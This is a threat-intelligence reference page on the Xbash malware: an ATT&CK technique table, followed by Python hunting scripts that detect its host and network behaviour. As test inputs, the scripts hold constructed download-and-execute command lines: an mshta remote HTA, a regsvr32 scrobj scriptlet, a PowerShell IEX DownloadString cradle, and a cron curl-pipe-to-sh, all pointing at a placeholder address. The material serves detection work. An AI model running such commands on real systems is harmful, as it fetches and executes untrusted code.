S0341 Xbash
Xbash is a malware family that has targeted Linux and Microsoft Windows servers. The malware has been tied to the Iron Group, a threat actor group known for previous ransomware attacks. Xbash was developed in Python and then converted into a self-contained Linux ELF executable by using PyInstaller.[1]
Item | Value |
---|---|
ID | S0341 |
Associated Names | |
Type | MALWARE |
Version | 1.2 |
Created | 30 January 2019 |
Last Modified | 23 June 2020 |
Techniques Used
Domain | ID | Name | Use |
---|---|---|---|
enterprise | T1071 | Application Layer Protocol | - |
enterprise | T1071.001 | Web Protocols | Xbash uses HTTP for C2 communications.[1] |
enterprise | T1547 | Boot or Logon Autostart Execution | - |
enterprise | T1547.001 | Registry Run Keys / Startup Folder | Xbash can create a Startup item for persistence if it determines it is on a Windows system.[1] |
enterprise | T1110 | Brute Force | - |
enterprise | T1110.001 | Password Guessing | Xbash can obtain a list of weak passwords from the C2 server to use for brute forcing, and can attempt to brute force services it finds listening on open ports.[1][2] |
enterprise | T1059 | Command and Scripting Interpreter | - |
enterprise | T1059.001 | PowerShell | Xbash can use scripts to invoke PowerShell to download a malicious PE executable or PE DLL for execution.[1] |
enterprise | T1059.005 | Visual Basic | Xbash can execute malicious VBScript payloads on the victim's machine.[1] |
enterprise | T1059.007 | JavaScript | Xbash can execute malicious JavaScript payloads on the victim's machine.[1] |
enterprise | T1485 | Data Destruction | Xbash has destroyed Linux-based databases as part of its ransomware capabilities.[1] |
enterprise | T1486 | Data Encrypted for Impact | Xbash's ransom note tells victims their databases have been encrypted and demands a cryptocurrency ransom; the cited analysis found no encryption or backup routine, so the data is simply deleted and paying does not recover it.[1] |
enterprise | T1203 | Exploitation for Client Execution | Xbash can attempt to exploit known vulnerabilities in Hadoop, Redis, or ActiveMQ when its scanning finds those services running, in order to conduct further execution.[1][2] |
enterprise | T1105 | Ingress Tool Transfer | Xbash can download additional malicious files from its C2 server.[1] |
enterprise | T1046 | Network Service Discovery | Xbash can perform port scanning of TCP and UDP ports.[1] |
enterprise | T1053 | Scheduled Task/Job | - |
enterprise | T1053.003 | Cron | Xbash can create a cron job for persistence if it determines it is on a Linux system.[1] |
enterprise | T1218 | System Binary Proxy Execution | - |
enterprise | T1218.005 | Mshta | Xbash can use mshta for executing scripts.[1] |
enterprise | T1218.010 | Regsvr32 | Xbash can use regsvr32 for executing scripts.[1] |
enterprise | T1016 | System Network Configuration Discovery | Xbash can collect IP addresses and local intranet information from a victim's machine.[1] |
enterprise | T1102 | Web Service | - |
enterprise | T1102.001 | Dead Drop Resolver | Xbash can obtain a webpage hosted on Pastebin to update its C2 domain list.[1] |
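The host-side rows above (mshta and regsvr32 proxy execution, the PowerShell download cradle, the Linux cron job and the Windows Startup item) translate directly into hunting rules. The following is an added example written for this page, not Xbash's code and not a tool from the cited reports; the command lines, cron entries, paths, hosts and URLs are constructed placeholders, and nothing is fetched or executed:

```python
"""Added example: host-side hunting rules for the Xbash TTPs in the table
above. Illustrative code for this page, not Xbash's own code and not from
the cited reports. All events below are constructed; 203.0.113.10 and the
paths are placeholders, and nothing is fetched or executed."""
import re

URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def exe_name(cmdline):
    """Lower-cased basename of the first token of a command line."""
    tokens = cmdline.strip().split()
    if not tokens:
        return ""
    return tokens[0].strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyze_windows_cmdline(cmdline):
    """Map one Windows process command line to the ATT&CK IDs it matches."""
    hits = []
    exe = exe_name(cmdline)
    low = cmdline.lower()
    has_url = URL.search(cmdline) is not None
    # T1218.005: mshta pulling an HTA/script from a remote URL
    if exe == "mshta.exe" and has_url:
        hits.append("T1218.005")
    # T1218.010: regsvr32 /i:<url> with scrobj.dll (remote scriptlet)
    if exe == "regsvr32.exe" and re.search(r"[/-]i:", low) and (has_url or "scrobj.dll" in low):
        hits.append("T1218.010")
    # T1059.001, plus T1105 when a URL is present: PowerShell download cradle
    if exe in ("powershell.exe", "pwsh.exe") and re.search(
            r"downloadstring|downloadfile|invoke-webrequest|invoke-expression|\b(iwr|iex)\b", low):
        hits.append("T1059.001")
        if has_url:
            hits.append("T1105")
    return hits


def analyze_cron_line(line):
    """Flag crontab entries that fetch a URL and pipe it into a shell (T1053.003)."""
    s = line.strip()
    if not s or s.startswith("#"):
        return []
    low = s.lower()
    fetches_url = re.search(r"\b(curl|wget)\b", low) and URL.search(s)
    pipes_to_shell = re.search(r"\|\s*(ba)?sh\b", low)
    return ["T1053.003"] if fetches_url and pipes_to_shell else []


STARTUP_DIR = re.compile(r"\\start menu\\programs\\startup\\", re.IGNORECASE)
SCRIPT_EXT = (".vbs", ".vbe", ".js", ".jse", ".hta", ".wsf", ".ps1", ".bat", ".cmd")


def analyze_startup_path(path):
    """Flag script or HTA files dropped into a Startup folder (T1547.001)."""
    if STARTUP_DIR.search(path) and path.lower().endswith(SCRIPT_EXT):
        return ["T1547.001"]
    return []


# Constructed telemetry; the last entries of each list are benign controls.
WINDOWS_CMDLINES = [
    r'mshta.exe http://203.0.113.10/u.hta',
    r'regsvr32.exe /s /n /u /i:http://203.0.113.10/s.sct scrobj.dll',
    'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'http://203.0.113.10/p.ps1\')"',
    r'regsvr32.exe /s "C:\Program Files\Vendor\plugin.dll"',   # benign: local DLL, no /i:
    r'mshta.exe "C:\Program Files\Vendor\help.hta"',            # benign: local HTA, no URL
]
CRON_LINES = [
    "*/10 * * * * curl -fsSL http://203.0.113.10/x.sh | sh",
    "0 3 * * * /usr/bin/certbot renew --quiet",                 # benign
]
STARTUP_PATHS = [
    r"C:\Users\svc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.vbs",
    r"C:\Users\svc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote.lnk",  # benign
]


def hunt(cmdlines=WINDOWS_CMDLINES, cron_lines=CRON_LINES, startup_paths=STARTUP_PATHS):
    """Return {technique_id: [matching raw records]} across all three sources."""
    findings = {}
    checked = (
        [(c, analyze_windows_cmdline(c)) for c in cmdlines]
        + [(c, analyze_cron_line(c)) for c in cron_lines]
        + [(p, analyze_startup_path(p)) for p in startup_paths]
    )
    for record, ids in checked:
        for tid in ids:
            findings.setdefault(tid, []).append(record)
    return findings


if __name__ == "__main__":
    for tid, records in sorted(hunt().items()):
        print(tid)
        for r in records:
            print("   ", r)
```

The benign controls matter as much as the positives: a local `mshta.exe file.hta` or a plain `regsvr32 /s plugin.dll` is routine on Windows, so the rules key on the remote URL and the `/i:` scriptlet switch rather than on the binary name alone. On a server fleet, the cron rule can be tightened further by alerting on any crontab line containing a URL, since scheduled jobs on production hosts rarely need to download anything.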
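Two of the rows above are best seen on the wire rather than on the host: the TCP/UDP port scanning (T1046) and the Pastebin dead drop resolver (T1102.001). This is an added example written for this page, not Xbash's code and not a tool from the cited reports; the flow records, proxy log, addresses, server list and paste IDs are constructed placeholders:

```python
"""Added example: network-side checks for two Xbash behaviours in the table
above, port scanning (T1046) and the Pastebin dead drop resolver (T1102.001).
Illustrative code for this page, not Xbash's own code and not from the cited
reports. The flow records, proxy log, addresses and paste IDs are constructed."""
from collections import defaultdict
from urllib.parse import urlparse

# Constructed flow records: (timestamp_sec, src_ip, dst_ip, proto, dst_port).
# 10.0.0.5 sweeps service ports on two hosts, including Redis (6379),
# Hadoop YARN (8088) and ActiveMQ (8161), services the page says Xbash targets;
# 10.0.0.9 is an ordinary client talking to one port.
FLOWS = [
    (100, "10.0.0.5", "10.0.0.20", "tcp", 22),
    (101, "10.0.0.5", "10.0.0.20", "tcp", 6379),
    (101, "10.0.0.5", "10.0.0.20", "tcp", 8088),
    (102, "10.0.0.5", "10.0.0.20", "tcp", 8161),
    (102, "10.0.0.5", "10.0.0.20", "tcp", 3306),
    (103, "10.0.0.5", "10.0.0.20", "udp", 161),
    (103, "10.0.0.5", "10.0.0.20", "tcp", 5432),
    (104, "10.0.0.5", "10.0.0.20", "tcp", 27017),
    (105, "10.0.0.5", "10.0.0.20", "tcp", 7001),
    (110, "10.0.0.5", "10.0.0.21", "tcp", 6379),
    (111, "10.0.0.5", "10.0.0.21", "tcp", 8088),
    (200, "10.0.0.9", "10.0.0.20", "tcp", 443),
    (260, "10.0.0.9", "10.0.0.20", "tcp", 443),
]


def detect_port_scans(flows, window=60, threshold=8):
    """Alert when one source touches >= threshold distinct (dst, proto, port)
    targets inside any `window`-second span (T1046). Returns
    [(src, window_start_ts, trigger_ts, distinct_targets)], one per source."""
    by_src = defaultdict(list)
    for ts, src, dst, proto, port in flows:
        by_src[src].append((ts, (dst, proto, port)))
    alerts = []
    for src, events in by_src.items():
        events.sort()
        in_window = defaultdict(int)  # target -> hits currently inside the window
        left = 0
        for ts, target in events:
            in_window[target] += 1
            # slide the left edge so the window covers (ts - window, ts]
            while events[left][0] <= ts - window:
                old = events[left][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                left += 1
            if len(in_window) >= threshold:
                alerts.append((src, events[left][0], ts, len(in_window)))
                break  # one alert per source is enough for this demonstration
    return alerts


# Constructed proxy log: (timestamp_sec, src_ip, method, url, user_agent).
PROXY_LOG = [
    (130, "10.0.0.5", "GET", "http://pastebin.com/raw/paste1", "python-requests/2.18.4"),
    (131, "10.0.0.5", "GET", "http://203.0.113.10/x.sh", "python-requests/2.18.4"),
    (300, "10.0.0.42", "GET", "https://pastebin.com/raw/paste2", "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"),
]
SERVER_HOSTS = {"10.0.0.5", "10.0.0.20", "10.0.0.21"}   # assumed: hosts with no interactive users
DEAD_DROP_HOSTS = {"pastebin.com"}                      # extend with other paste/text-hosting sites


def detect_dead_drop_fetches(proxy_log, server_hosts=SERVER_HOSTS):
    """Flag raw-paste fetches made from server hosts (T1102.001). A workstation
    user reading Pastebin is normal; a database server pulling /raw/ is not.
    Returns [(src, url, user_agent)]."""
    hits = []
    for _ts, src, _method, url, user_agent in proxy_log:
        parts = urlparse(url)
        host = (parts.hostname or "").lower()
        if src in server_hosts and host in DEAD_DROP_HOSTS and parts.path.startswith("/raw/"):
            hits.append((src, url, user_agent))
    return hits


def correlate(flows=FLOWS, proxy_log=PROXY_LOG):
    """Sources that both scanned and pulled a dead drop, the combination the
    table describes (scan for services, refresh the C2 list from Pastebin)."""
    scanners = {a[0] for a in detect_port_scans(flows)}
    resolvers = {h[0] for h in detect_dead_drop_fetches(proxy_log)}
    return sorted(scanners & resolvers)


if __name__ == "__main__":
    print("port scans:", detect_port_scans(FLOWS))
    print("dead drop fetches:", detect_dead_drop_fetches(PROXY_LOG))
    print("both:", correlate())
```

The scan detector counts distinct (destination, protocol, port) targets rather than packets, so a single busy connection never trips it, and UDP probes count alongside TCP ones because the page notes Xbash scans both. The dead-drop check deliberately does not block pastebin.com outright; it keys on the /raw/ path and on the source being a server, which is where the signal lives.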
References
1. Xiao, C. (2018, September 17). Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows. Palo Alto Networks Unit 42. Retrieved November 14, 2018.
2. Trend Micro. (2018, September 19). New Multi-Platform Xbash Packs Obfuscation, Ransomware, Coinminer, Worm and Botnet. Retrieved June 4, 2019.